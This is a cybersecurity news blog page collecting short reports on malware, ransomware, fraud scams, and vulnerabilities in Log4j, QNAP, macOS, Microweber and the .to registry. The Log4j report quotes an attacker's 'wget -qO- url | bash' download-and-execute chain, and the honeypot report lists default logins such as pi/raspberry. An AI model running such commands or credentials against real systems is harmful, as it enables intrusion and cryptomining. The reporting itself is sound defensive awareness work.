Search This Blog

Showing posts with label attackers. Show all posts

This Malware is Spreading Via Fake Cracks

 

An updated sample of the CopperStealer malware has been detected, infecting devices via websites providing fraudulent cracks for applications and other software.

Cyber attackers employ these bogus apps to perform a range of assaults. The hackers in this assault operation took advantage of the desire for cracks by releasing a phoney cracked programme that actually contained malware. 

The infection starts with a website or Telegram channel offering/presenting false cracks for downloading and installing the needed cracks. The downloaded archive files include a password-protected text file and another encrypted archive. 

The decrypted archive displays the executable files when the password specified in the text file is typed. There are two files in this sample: CopperStealer and VidarStealer. 

What are the impacts of Copper Stealer and Vidar Stealer on the systems? 

CopperStealer and Vidar stealer can cause many system infections, major privacy problems, financial losses, and identity theft. 
  • CopperStealer: The primary function of CopperStealer is to steal stored login information - usernames and passwords - as well as internet cookies from certain browsers. Mostly focuses on the login details for business-oriented Facebook and Instagram accounts. CopperStealer variants also seek login credentials for platforms and services such as Twitter, Tumblr, Apple, Amazon, Bing, and Apple. The malware can steal Facebook-related credentials from browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, Opera, and Yandex.
  • Vidar stealer: The most common ways for this malware to propagate are through pirated software and targeted phishing efforts. Vidar stealer is capable of stealing credit cards, usernames, passwords, data, and screenshots of the user's desktop. The malware steals data from a range of browsers and other system apps. It can also steal cryptocurrency wallets such as Bitcoin and Ethereum. 
Safety first

Attackers can utilise data stealers like CopperStealer to steal sensitive information for more illegal reasons. Users can stay secure by taking the following precautions: 
  • Downloading cracks from third-party websites should be avoided. 
  • Keep the systems up to date with the newest patches. 
  • It is highly advised that security detection and prevention technologies be enabled to safeguard systems from attacks.

HR Manager of Private Company Duped of ₹28 Lakh

 

The cybercrime police are looking for a person who pretended to be the managing director of a private company and duped the firm's HR manager into transferring 28.8 lakh online before fleeing. 

On Sunday, the police lodged a case against the unknown individual, accusing him of different sections of the IT Act as well as cheating and impersonation under the IPC, based on a complaint filed by Nirmal Jain, the owner of the private enterprise. 

According to Mr. Jain's allegation, the accused sent a WhatsApp message to HR manager Thirupathi Rao pretending to be Paras Jain, the company's MD. The MD's image was on the WhatsApp profile, and the message stated that it was his personal number and that he was at a meeting and should not be disturbed. 

The individual then requested that Mr. Rao move the funds to three bank accounts online on an emergency basis. Mr. Rao followed the instructions and transferred a total of 28.89,807 to the private bank account numbers specified in the communication. When he told higher officials about the transactions, the scam was discovered. 

Based on the transaction information, the authorities are now attempting to locate the accused. This is a new trend among internet fraudsters who download the profile images of senior executives of organisations in order to scam their office staff, according to experts.

BlackCat Ransomware Group Demands $5Million to Unlock Austrian State

 

The BlackCat ransomware group, also known as ALPHV, has targeted the Austrian federal state Carinthia, demanding $5 million to open encrypted computer systems. The threat actor allegedly locked thousands of workstations during the attack on Tuesday, causing serious operational interruption to government services. 

The website and email service for Carinthia are temporarily down, and the government is unable to issue new passports or traffic penalties. Furthermore, the intrusion hampered the completion of COVID-19 testing and contact tracking through the region's administrative offices. 

For $5 million, the hackers offered to deliver a functioning decryption tool. Gerd Kurath, a state spokesperson, told Euractiv that the attacker's demands will not be fulfilled. 

According to the press spokesperson, there is presently no proof that BlackCat was able to take any data from the state's systems, and the aim is to restore the workstations using accessible backups. Kurath stated that the first of the 3,000 impacted systems are likely to be operational again soon. 

At the time of writing, there is no material from Carinthia on BlackCat's data leak site, where hackers post files taken from victims who did not pay a ransom. This might imply a recent incident or that discussion with the victim are still ongoing. 

In November 2021, the ALPHV/BlackCat ransomware group emerged as one of the more advanced ransomware attacks. They are a rebranded version of the DarkSide/BlackMatter gang, which is responsible for the Colonial Pipeline attack last year. 

BlackCat affiliates launched attacks on high-profile companies and brands such as the Moncler fashion firm and the Swissport airline freight handling services provider in early 2022. 

By the completion of the first quarter of the current year, the FBI issued a warning that BlackCat had breached at least 60 businesses globally, adopting the position that it was expected to achieve as one of the most active and dangerous ransomware projects out there. 

The attack on Carinthia and the hefty ransom demands demonstrate that the threat actor targets firms that can pay substantial sums of money to get their systems decrypted and prevent additional financial losses due to lengthy operational interruption.

FBI: Business Email Compromise is a $43 Billion Scam

 

The FBI recently announced that the amount of money lost to business email compromise (BEC) scams is increasing each year, with a 65 per cent rise in identified global exposure losses between July 2019 and December 2021.

From June 2016 to July 2019, IC3 received victim complaints about 241,206 domestic and international occurrences, totalling $43,312,749,946 in exposed cash loss. 

The FBI stated, "Based on the financial data reported to the IC3 for 2021, banks located in Thailand and Hong Kong were the primary international destinations of fraudulent funds. China, which ranked in the top two destinations in previous years, ranked third in 2021 followed by Mexico and Singapore." 

This was revealed in a new public service announcement issued on the Internet Crime Complaint Center (IC3) site as an update to a prior PSA dated September 2019, in which the FBI stated victims reported losses to BEC attacks totalling more than $26 billion between June 2016 and July 2019. 

About BEC scams:

BEC scams were the cybercrime type with the highest recorded overall victim losses last year, according to the IC3 2021 Internet Crime Report [PDF]. Based on 19,954 registered complaints relating to BEC attacks against individuals and businesses in 2021, victims reported losses of about $2.4 billion. BEC scammers use a variety of techniques to infiltrate business email accounts, including social engineering, phishing, and hacking, to transfer payments to attacker-controlled bank accounts. 

Small, medium and big enterprises are frequently targeted in this form of scam (also known as EAC or Email Account Compromise). Nonetheless, if the payout is high enough, they will attack individuals. Given that they often imitate someone who has the target's trust, their success rate is also very high. 

However, "the scam is not always associated with a transfer-of-funds request," as the FBI explained in the PSA alert. "One variation involves compromising legitimate business email accounts and requesting employees' Personally Identifiable Information, Wage and Tax Statement (W-2) forms, or even cryptocurrency wallets."

The FBI also offered advice on how to protect yourself from BEC scams:
  • Use secondary channels or two-factor authentication to verify requests for changes in account information.
  • Ensure the URL in emails is associated with the business/individual it claims to be from.
  • Be alert to hyperlinks that may contain misspellings of the actual domain name.
  • Refrain from supplying log-in credentials or PII of any sort via email. Be aware that many emails requesting your personal information may appear to be legitimate.
  • Verify the email address used to send emails, especially when using a mobile or handheld device, by ensuring the sender's address appears to match who it is coming from.
  • Ensure the settings in employees' computers are enabled to allow full email extensions to be viewed.
  • Monitor your personal financial accounts on a regular basis for irregularities, such as missing deposits.

Microweber Creators Patched XSS Flaw in CMS Software

 

Microweber, an open-source website builder and content management system, has a stored cross-site scripting (XSS) vulnerability, according to security researchers. 

The security flaw, identified as CVE-2022-0930 by researchers James Yeung and Bozhidar Slaveykov, was patched in Microweber version 1.2.12. The issue developed as a result of flaws in older versions of Microweber's content filtering protections. 

Because of these flaws, attackers could upload an XSS payload as long as it contained a file ending in 'html' — a category that encompasses far more than simply plain.html files. Once this payload is uploaded, a URL with malicious HTML can be viewed and malicious JavaScript performed. 

An attacker could steal cookies before impersonating a victim, potentially the administrator of a compromised system, by controlling a script that runs in the victim's browser. A technical blog article by Yeung and Slaveykov, which includes a proof-of-concept exploit, gives additional detail about the assault. Microweber was asked to comment on the researchers' findings via a message sent through a webform on The Daily Swig's website. Microweber responded by confirming that the "issue is already fixed." 

When asked how they found Microweber as a target, Yeung told The Daily Swig, “I came across huntr.dev and found other researchers had found vulnerabilities on Microweber and that's why I joined that mania!” 

The vulnerabilities discovered in Microweber are similar to those found in other comparable enterprise software packages. The researcher explained, “I have found similar vulnerabilities in multiple CMS like Microweber, and I found that most of them are lacking user input sanitization from HTTP requests (some of which are not intended to be submitted from client).” 

To avoid issues in this area, Yeung determined that developers should gradually shift toward allow-lists and away from utilising block-lists.

Attackers UtilizingDefault Credentials to Target Businesses, Raspberry Pi and Linux Top Targets

 

While automated attacks remain a major security concern to enterprises, findings from a Bulletproof analysis highlight the challenge created by inadequate security hygiene. According to research conducted in 2021, bot traffic currently accounts for 70% of total web activity.

Default credentials are the most popular passwords used by malicious attackers, acting as a 'skeleton key' for criminal access. With attackers increasingly deploying automated attack methods 

Brian Wagner, CTO at Bulletproof stated, “On the list are the default Raspberry Pi credentials (un:pi/pwd:raspberry). There are more than 200,000 machines on the internet running the standard Raspberry Pi OS, making it a reasonable target for bad actors. We also can see what looks like credentials used on Linux machines (un:nproc/pwd:nproc). This highlights a key issue – default credentials are still not being changed.”

“Using default credentials provides one of the easiest entry points for attackers, acting as a ‘skeleton key’ for multiple hacks. Using legitimate credentials can allow attackers to avoid detection and makes investigating and monitoring attacks much harder.” 

According to the findings, attackers are continuously utilising the same typical passwords to gain access to systems. Some are default passwords that haven't been updated since the company started using them. The RockYou database leak from December 2009 is accountable for a quarter of all passwords used by attackers today. This degree of activity suggests that these passwords are still valid. 

During the period of the research, threat actors started almost 240,000 sessions. The top IP address, which came from a German server, started 915 sessions and stayed on the Bulletproof honeypot for a total of five hours. Another attacker spent 15 hours on the honeypot, successfully logging in 29 times with more than 30 different passwords. In sum, 54 per cent of the more than 5,000 distinct IP addresses had intelligence indicating they were bad actor IP addresses.

Wagner continued, “Within milliseconds of a server being put on the internet, it is already being scanned by all manner of entities. Botnets will be targeting it and a host of malicious traffic is then being driven to the server.” 

“Although some of our data shows legitimate research companies scanning the internet, the greatest proportion of traffic we encountered to our honeypot came from threat actors and compromised hosts. These insights, combined with our data, highlight the importance of proactive monitoring to ensure you are aware of the threats to your business on a daily basis, as well as a tried and tested incident response plan.”

Attackers Gained Access to the Systems of the National Games of China

 

China has recently had its own national sporting event: the National Games of China began on September 15, 2021, in the Chinese city of Shaanxi. This is a comparable event to the Olympics, however, it only features athletes from China. The National Games of the People's Republic of China, also known as the All-China Games, are China's biggest national sporting event. It is typically held every four years. 

David Álvarez, an Avast security researcher, discovered a malware sample with a peculiar file extension in early September and started to examine where it came from. Following that, he discovered a report submitted to VirusTotal by the National Games IT team on an attack against a server associated with the Games.

The data suggests that the attackers acquired initial code execution on September 3, 2021, about 10:00AM local time, and deployed their first reverse shell executing scripts called runscript.lua. Researchers believe this occurred as a result of an arbitrary file-read vulnerability targeting either route .lua which, according to the API (Application User Interface) extracted from various JavaScript files, is a LUA script containing a lot of functionality ranging from login authentication to file manipulation or index.lua in combination with index.lua?a=upload API that was not used by anyone else in the rest of the network log. It's also worth noticing that runscript.lua was not included in the report or among the files uploaded by the attacker. 

After gaining initial access, the attackers uploaded numerous other reverse shells, such as conf.lua, miss1.php, or admin2.php, to gain a more permanent foothold in the network in the event that one of the shells was found. Because these reverse shells receive commands via POST requests, the data is not contained in the logs attached to the report, which simply show the URL path. Furthermore, the logs in the report do not contain enough information about network traffic for researchers to understand how and when the attackers obtained their initial web shell. 

The method used by the attackers to hack the 14th National Games of China is not novel. They got access to the system by taking advantage of a flaw in the webserver. This highlights the importance of updating software, correctly configuring it, and being aware of potential new vulnerabilities in apps by employing vulnerability scanners.

The most essential security countermeasure for defenders is to maintain the infrastructure patched up to date (especially for the internet-facing infrastructure). The primary priority for both internal and internet-facing infrastructure should be prevention. According to the researchers, in order to fight against this type of attack, more layers of protection must be deployed so that users can identify and respond immediately when a successful breach occurs.

Telco Penalized €9 Million for Obscuring Cyberattack Impact from Customers

 

The Greek data protection authority imposed a fine on COSMOTE of 5,850,000 EUR ($6.55 million) and OTE was fined 3,250,000 EUR ($3.65 million) for exposing sensitive customer data due to a cyberattack. 

COSMOTE violated at least eight articles of the GDPR, according to the agency, including its responsibility to inform impacted customers of the full consequences of the incident. 

COSMOTE and OTE (Hellenic Telecommunications Organization) are both parts of the OTE Group, Greece's largest technological business, which provides fixed and mobile telephony, broadband, and network communication services. 

COSMOTE launched an internal investigation in 2020 and discovered that a hacker utilized LinkedIn to social engineer one of its employees and then used brute-forcing techniques to obtain the target's account credentials. According to the investigation's results, the attacker repeatedly utilized a Lithuanian IP address to access one of OTE's servers. On five consecutive occasions, the threat actor used the account credentials to extract database files and the data that was stolen and was 48GB in size. 

COSMOTE keeps call details on its servers for 90 days for service quality assurance and further 12 months for statistical analysis that aids in targeted service enhancement. The anonymization process wasn't done effectively, and the data holding periods weren't fully adhered to, as the data protection authority investigation discovered. 

The compromised server included sensitive subscriber information and call data for the dates September 1, 2020, to September 5, 2020. 

The following are some of the details that have been revealed: 
• Rough positional data of 4,792,869 unique COSMOTE subscribers. 
• Age, gender, plan, and ARPU of 4,239,213 unique COSMOTE subscribers. 
• MSISDN/CLI of 6,939,656 users of other telecommunication providers who communicated with customers of COSMOTE. 
• MSISDN, IMEI, IMSI, and connected tower position for 281,403 roaming subscribers of COSMOTE. 

In some circumstances, the above data could be utilised for highly targeted social engineering, phishing, and even extortion. Nonetheless, for targeted subscribers who may be high-interest personalities, the consequences of the hacking attack could be substantial.

Attackers Could Gain Access to User Data due to a 'Powerdir' Flaw in macOS

 

On January 11th, Microsoft disclosed a vulnerability in Apple's macOS that might let an attacker to get unauthorised access to protected user data by circumventing the operating system's Transparency, Consent, and Control (TCC) technology. On July 15, 2021, the Microsoft Security Vulnerability Research (MSVR) team disclosed its discovery to Apple's product security team. In a security update released on December 13, Apple fixed CVE-2021-30970, dubbed "Powerdir." 

TCC is an Apple subsystem that was first introduced in macOS Mountain Lion in 2012. The technology was created to assist users in configuring the privacy settings of their device's applications, such as access to the camera or microphone, or access to their calendar or iCloud account. 

Previously, apps could directly access TCC databases to see and even edit their contents. Apple made two adjustments in response to the possibility of bypass. First, Apple used System Integrity Protection (SIP) to safeguard the system-wide TCC.db, a macOS feature that prohibits illegal code execution. Second, Apple implemented a TCC policy requiring that only apps with full disk access can access the TCC.db files.

The vulnerability discovered by Microsoft would allow attackers to circumvent this feature and start an attack on a macOS device. When an app asks for access to protected user data, one of two things can happen: If the app and request type have a record in the TCC databases, a flag in the database entry indicates whether the request should be allowed or denied without the need for user intervention. If they do not have a record, the user is asked whether they want to allow or restrict access. 

Researchers discovered that it is easy to programmatically modify a target's home directory and plant a bogus TCC database, which maintains the consent history of app requests, wrote Jonathan Bar, with the Microsoft 365 Defender Research Team, in a blog post on the findings. If abused on an unpatched system, this issue might allow an attacker to launch an attack using the victim's protected personal data, according to him. 

This is the latest in a long line of TCC flaws fixed by Apple in recent years. Apple fixed CVE-2021-30713, a flaw that allowed attackers to bypass TCC protections and deliver XCSSET malware, last year. According to Jamf researchers who identified the problem, once on a machine, XCSSET used the bypass to take a screenshot of the user's desktop without requiring rights. 

Other reported vulnerabilities linked to TCC bypass in the previous year included CVE-2020-9771 and CVE-2020-9934. Apple's remedy for the latter piqued Microsoft's interest, and during their investigation, the team found an exploit that an attacker could use to change settings on any app.

Log4j Attackers Switch to Injecting Monero Miners via RMI

 

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, threat actors attempting to steal resources for Monero mining have identified this trend, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service. 

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not have strict rules, RMI may be a more easy way to do RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests using JNDI and LDAP, thus RMI may be disregarded for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request. 

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body which is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86 64 Linux systems and uses the cron subsystem for persistence. Even though the majority of attacks have targeted Linux systems. 

CheckPoint states to have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.' by its investigators. 

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security area for new version announcements and execute them as soon as possible.

Ransomware Attackers and their Industry Standards for Attacking

 

Ransomware attackers have been developing 'industry standards' that they will use to determine a perfect target for their assaults. 

KELA identified 48 comment threads on dark web forums in July 2021 in this regard. Users alleged to be digital attackers trying to purchase network access. Approximately tow-fifth of the threads were established by individuals associated with Ransomware-as-a-Service (RaaS) schemes, comprising operators, associates, and middlemen, according to the intelligence solutions provider. KELA learned from those conversation threads that ransomware attackers hunt for specific criteria when purchasing accesses. 

These elements include the following: 

  • Geographically, almost half (47 percent) of ransomware attackers identified the United States as the preferred destination for their targets. Canada, Australia, and European countries were next on the list, with preferences of 37%, 37%, and 31%, respectively. 

  • Revenue: On aggregate, ransomware attackers expected their victims to make at least $100 million, while they occasionally indicated various ransom sums for different places. Attackers stated that they sought more than $5 million in compensation for victims in the United States, as well as at least $40 million in revenue from "third-world" countries. 

  • Disallowed Industries: Almost half (47%) of ransomware attackers indicated they were unwilling to pay for admission to companies involved in health care and education. Slightly fewer (37 percent) declined to target the government sector, while over a quarter of ransomware perpetrators stated that they would not purchase access to non-profit organizations. 

  • Countries Excluded: Some attackers declined to target companies or government agencies in Russian-speaking countries. They appear to have selected this based on the idea that if they did not target the region, local law enforcement would not worry them. Others ruled out targeting South America or third-world countries as a region. They reasoned that an attack there would not net them enough money. 

The aforementioned data is compatible with several of the ransomware assaults that made the headlines earlier in 2021. 

For instance, consider the attack on the Colonial Pipeline. As per Dun & Bradstreet, the Colonial Pipeline Company, headquartered in Port Arthur, Texas, earned $1.32 billion in revenue in 2020. The business doesn't operate in any of the prohibited industries listed above. Colonial, on the other hand, is a key infrastructure company in the United States. Due to the attacks like this, the FBI as well as other federal law enforcement agencies targeted the DarkSide RaaS gang just after the attack.

Another instance that met the same requirements was the Kaseya supply chain attack. The headquarters of the IT management software company is in Miami, Florida. Furthermore, Kaseya was valued at more than $2 billion by the end of 2019. 

According to KELA, businesses and government institutions could defend themselves from such ransomware attacks in three ways. Firstly, companies could train the employees and the C-suite through security awareness training. This will educate them on how to protect their data and identify suspicious activities on their employer's networks. Secondly, they could utilize vulnerability management to keep an eye on their systems for known flaws. They could then address such faults first. Finally, they could use an up-to-date asset inventory to keep an eye on their devices and systems for unusual behavior.

Due to a Vulnerability in the TLD Registrar's Website, Attackers May Have Modified the Nameservers

 

Due to a vulnerability in the TLD registrar's website, attackers may have changed the name-servers of any domain under Tonga's country code top-level domain (ccTLD), according to security researchers. With approximately 513 million results from a Google search for '.to' pages, the weakness provided potential miscreants with a plethora of potential targets for a variety of large-scale attacks. The Tonga Network Information Center (Tonic) was "extremely quick" in resolving the bug in under 24 hours after online security firm Palisade exposed the issue, following a pen test, on October 8, 2021, according to a Palisade blog post. 

Sam Curry and other Palisade researchers uncovered an SQL injection vulnerability on the registrant website, which could be used to gain plaintext DNS master passwords for.to domains. Once signed in, they may modify the DNS settings for these domains and redirect traffic to their own website. According to Curry, the attacker might then steal cookies and local browser storage and therefore access victim sessions, among other assaults. 

An attacker may send crafted accounts if they gained control of google.to, an official Google domain for redirects and OAuth authorization processes. OAuth is a popular authorization mechanism that allows websites and web applications to request limited access to another application's user account. Importantly, OAuth enables the user to authorize this access without revealing their login credentials to the requesting application. This implies that instead of handing over complete control of their account to a third party, users can fine-tune which data they want to disclose. 

The fundamental OAuth protocol is extensively used to integrate third-party functionality that requires access to certain data from a user's account. For example, an application may utilise OAuth to request access to your email contacts list in order to recommend individuals to connect with. The same approach, however, is also used to enable third-party authentication services, allowing users to log in with an account they have with another website. 

As with .io, .to domains are extensively used to generate short links that are used to reset user passwords, for affiliate marketing, and to drive users to company resources. Curry argued that link shortening services used by Amazon (amzn.to), Uber (ubr.to), and Verizon (vz.to) may have been misused by altering the '.to' pages to which these giant brands' tweets connected for their millions of Twitter followers. 

Curry speculated that attackers "could likely steal a very big amount of money" from customers of tether.to, the official platform for purchasing Tether stable coin - even if they "only owned this domain for a short period of time." However, Eric Gullichsen, administrator of the.to ccTLD, stated that “various security and monitoring and throttling systems we already had in place would have defeated many of the exploits used during the pen test, had the security researchers’ IP addresses not been whitelisted to enable their testing.”

Attackers Could Use a Bug in the Squirrel Engine to Hack Games and Cloud Services

 

An out-of-bounds read vulnerability in the Squirrel programming language allows attackers to bypass sandbox limitations and execute arbitrary code within a Squirrel virtual machine (VM), giving them complete control over the underlying machine. Given where Squirrel lives – in games and embedded in the internet of things (IoT), the bug could endanger the millions of monthly gamers who play video games like Counter-Strike: Global Offensive and Portal 2, as well as cloud services like the Twilio Electric Imp IoT platform, which has an open-source code library that is ready to use. 

The issue is tracked as CVE-2021-41556, and it affects stable release branches 3.x and 2.x of Squirrel. It occurs when a gaming library known as Squirrel Engine is used to execute untrusted code. On August 10, 2021, the vulnerability was responsibly disclosed. The Squirrel Engine was designed to be a model for multi-core gaming engine efficiency. It's designed to get the most out of high-end computer hardware. 

Squirrel is an open-source object-oriented programming language used for customization and plugin development in video games and cloud applications. It's a scripting language that fits the size, memory bandwidth, and real-time demands of video games and embedded systems. 

"In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report. "When a server owner downloads and installs this malicious map onto his server, the Squirrel script is executed, escapes its VM, and takes control of the server machine." 

When defining Squirrel classes, the security problem involves "out-of-bounds access via index confusion." The fact that bitflags are set within indexes is problematic since it is absolutely conceivable for an attacker to establish a class definition with 0x02000000 methods, the researchers explained. 

The flaw is severe because it allows a malicious actor to create a false array that can read and write values. The researchers discovered that overwriting function pointers allowed them to "hijack the control flow of the programme and take full control of the Squirrel VM." 

While the problem was fixed as part of a code commit on September 16, the modifications have yet to be included in a new stable release, with the most recent official version (v3.1) being issued on March 27, 2016. Maintainers that utilize Squirrel in their projects should apply the available repair commit to protect themselves from assaults, according to the researchers who found the issue.

Hiding ATM Pad Gives Less Protection Against Attackers: States Research

 

While using a credit card or cash card for money withdrawal from an ATM, users must provide their unique PIN. A careful individual might conceal the keypad with their hand as they input it so that nobody else learns their PIN, although even if they hide the keypad with their hand, it is possible to predict the PIN with good accuracy using a machine learning technique. 

Recently, investigations have indicated that it is viable to program a special-purpose deep-learning system to predict 4-digit card PINs 41% of the time, even when the victim is shielding the keypad with their hands. The attack necessitates the establishment of a copy of the target ATM since training the algorithm for the exact size and key spacing of the various PIN pads is critical. 

Utilizing footage of individuals inputting PINs on the ATM pad, the machine-learning model is then taught to detect pad presses and give particular probability on a set of possibilities. The researchers collected 5,800 recordings of 58 different people from various demographics inputting 4-digit and 5-digit PINs for the research. 

The prediction model was run on a Xeon E5-2670 having 128 GB of RAM and three Tesla K20m with 5GB of RAM each. Not any typical system, but probably within a reasonable cost range. 

The researchers rebuilt the right sequence for 5-digit PINs 30 percent of the time using three tries, which is generally the maximum allowed number of attempts before the card is blocked, and 41 percent of the time for 4-digit PINs. 

The model may omit keys based on non-typing hand coverage and derive pushed digits from other hand motions by calculating the topological distance between two keys. 

The positioning of the camera that catches the attempts is critical, particularly when filming left or right-handed people. The attacker concluded that concealing a pinhole camera at the top of the ATM was indeed the best choice. However, if the camera can capture audio as well, the model might employ pressing sound feedback that is slightly different for every digit, making the estimates much more precise. 

This experiment demonstrates that concealing the PIN keypad with the other hand is insufficient to guard against deep learning-based assaults, but there are several alternatives one may use. 

For instance, if the bank allows users to select a 5-digit PIN rather than a 4-digit PIN, go with the lengthier one. It will be more difficult to remember, but it is far more secure against any such attacks. Furthermore, the proportion of hand covering considerably reduces prediction accuracy. A coverage ratio of 75% results in an accuracy of 0.55 for each trial, whereas entire coverage (100%) results in an accuracy of 0.33. 

Another alternative would be to provide customers with a virtual and randomized keypad rather than the conventional mechanical one. This has unavoidable usability problems, but it is a great security precaution.

QNAP Patched a Flaw that Allowed Attackers to Remotely Execute Malicious Commands

 

QNAP, a Taiwanese NAS manufacturer, has issued security updates for numerous vulnerabilities that might allow attackers to remotely inject and execute malicious code and commands on susceptible NAS systems. File sharing, virtualization, storage management, and surveillance applications all employ network-attached storage (NAS) appliances. The headquarters of QNAP is located in the Xizhi District of New Taipei City, Taiwan. QNAP began as a department of the IEI Integration Corporation, a Taiwan-based industrial computer services provider. 

Three high-severity stored cross-site scripting (XSS) vulnerabilities (recorded as CVE-2021-34354, CVE-2021-34356, and CVE-2021-34355) affect devices running unpatched Photo Station software (releases before 5.4.10, 5.7.13, or 6.0.18), according to QNAP.

In addition, QNAP fixed a stored XSS Image2PDF problem that affected devices running software versions prior to Image2PDF 2.1.5. Threat actors can use stored XSS attacks to inject malicious code remotely and store it on the targeted servers indefinitely after successful exploitation.

Stored attacks are ones in which the injected script is kept on the target servers indefinitely, such as in a database, a chat forum, a visitor log, a comment field, and so on. When the victim requests information from the server, the malicious script is downloaded. 

A command injection bug (CVE-2021-34352) affecting some QNAP end-of-life (EOL) devices running the QVR IP video surveillance software was also fixed, allowing attackers to run arbitrary operations. Successful attacks leveraging the CVE-2021-34352 bug could result in NAS devices being completely taken over.

In April, QNAP NAS operating systems QTS and QuTS Hero were patched for a command injection vulnerability (CVE-2020-2509). The other critical flaw (CVE-2020-36195), which affected any QNAP NAS devices running Multimedia Console or the Media Streaming add-on, was also patched in the same batch of firmware upgrades.

 “Both vulnerabilities are simple to exploit if you know the exact technical details,” said Yaniv Puyeski, a security researcher of SAM Seamless Network. 

 The significant, pre-authenticated flaws, which require only network access to the susceptible services, highlight an insecure, all-too-common way of using the devices, according to Puyeski. “Unfortunately, a lot of QNAP owners expose their device to the internet through port forwarding which puts them at very high risk to be hacked,” he explained.

Hopper: A Tool Developed at Dropbox to Detect Lateral Movement Attacks

 

Hopper, a tool developed by Dropbox, UC Berkeley, and other organizations, adds a different method to spotting hostile activities in corporate networks. Hopper is a tool that examines an organization's login records to look for indicators of lateral movement attacks. The tool has two main components: a causality engine that tracks login paths and a score algorithm that determines which login paths contain lateral movement attack features. 

Dropbox, Inc., is an American corporation based in San Francisco, California. It offers cloud storage, file synchronization, personal cloud, and client software service. Dropbox organizes files into a single location on the user's computer by generating a dedicated folder. The contents of these folders are synchronized with Dropbox's servers as well as other computers and devices where the user has installed Dropbox, ensuring that all devices have the same files. 

Many data breaches and security issues in businesses begin with the compromising of a basic device or low-privileged user account. As attackers succeed, they acquire access to increasingly important systems and resources by moving beyond their initial point of entry to other workstations and administrator-level user accounts. This is referred to as "lateral movement," and it is a warning indication of an oncoming security disaster. 

It's difficult to tell the difference between typical user activity and malevolent lateral movement. Detecting the change in the past required establishing precise network activity rules or using anomaly detection methods. “Unfortunately, the scale of modern enterprises inherently produces large numbers of anomalous-but-benign logins, causing traditional anomaly detection to generate too many false alarms,” the researchers explain.

Hopper was created with the understanding that lateral movement attacks have two distinct characteristics – attackers want to gain access to a server that their original victim doesn't have, and they'll need to attack privileged accounts like sysadmins to accomplish so. Hooper can identify which behaviors require additional inquiry by filtering and reviewing login pathways based on these two vectors. 

Hopper was evaluated using 15 months of data from Dropbox's enterprise network, which includes more than 780 million login events and 326 simulated red team attacks. Other lateral movement detection techniques produced eight times more false alarms than the tool, which was able to detect 94.5 % of attacks.

Crypto Lending Service, Celsius Suffers Third Party Data Breach

 

Cryptocurrency rewards portal, Celsius has witnessed a data breach, with the personal details of its clients disclosed by a third-party services provider that resulted in a phishing attack, as confirmed in the email sent out to the Celsius clients. 

Celsius CEO Alex Mashinsky indicated that perhaps the third-party commercialization server of Celsius has been hacked and threat actors acquired access to a partial Celsius client list. The hackers used this knowledge to send Celsius clients malicious e-mails and text messages to reveal their secret keys. 

"An unauthorized party managed to gain access to a backup third-party email distribution system which had connections to a partial customer email list. Once inside the system, this unauthorized party sent a fraudulent email announcement, of which we know some of the recipients to be Celsius customers," sources noted.

The breach was intended to make clients believe that the malicious email originated from Celsius, also that the malicious website was a Celsius Website, and that they had their own (non-Celsius) wallet possession of the recipients' assets by encouraging the client to provide their private wallet address. The actors behind the attack caught up with Celsius Networks in phishing texts and emails promoting a new Celsius Web Wallet after accessing the customer list. To encourage people to visit the website, the Celsius text says, when they build a wallet and enter a certain promotion code, they will offer $500 for the CEL cryptocurrency. After clicking on the mentioned link, clients were asked to build a Celsius Web Wallet by the celsiuswallet[.]network website, which is now closed. Furthermore, Celsius users complained that phishing messages are received on phone numbers they have never sent to Celsius. 


The issue came to light on 14th April 2021 when clients from Celsius started reporting about a fake website claiming to be the Celsius official portal. The company has also notified some Celsius customers receiving SMS and emails claiming to be Celsius officials, referring to this website and encouraging recipients to enter confidential details according to their source. Meanwhile, the team also examined how hackers accessed Celsius customer telephone numbers because of the breach in an email management system. 

Nevertheless, some of the Celsius employees had the encouraging concept in response to recent incidents of setting up a compensation fund to help people who might have lost cryptocurrency assets.

REvil Ransomware Gang Introduces New Malware Features which can Reboot Infected Devices

 

The ransomware gang REvil introduced a special malware feature that allows attackers to reboot infected devices after encryption. REvil emerged in April 2019 and is also recognized by the names Sodinokibi and Sodin. The ransomware gang was linked to many important attacks, including attacks in May 2020 on popular law firm Grubman Shire Meiselas and Sacks and also an attack in April 2020 on Travelex, a London-based currency exchange that paid a $2.3 million ransom for recovering its data. 

The MalwareHunter team researchers recently tweeted that the REvil operators have introduced two new command lines named 'AstraZeneca' and 'Franceisshit,' in Windows Safe Mode, which is utilized to reach the initialization screen for Windows devices. 

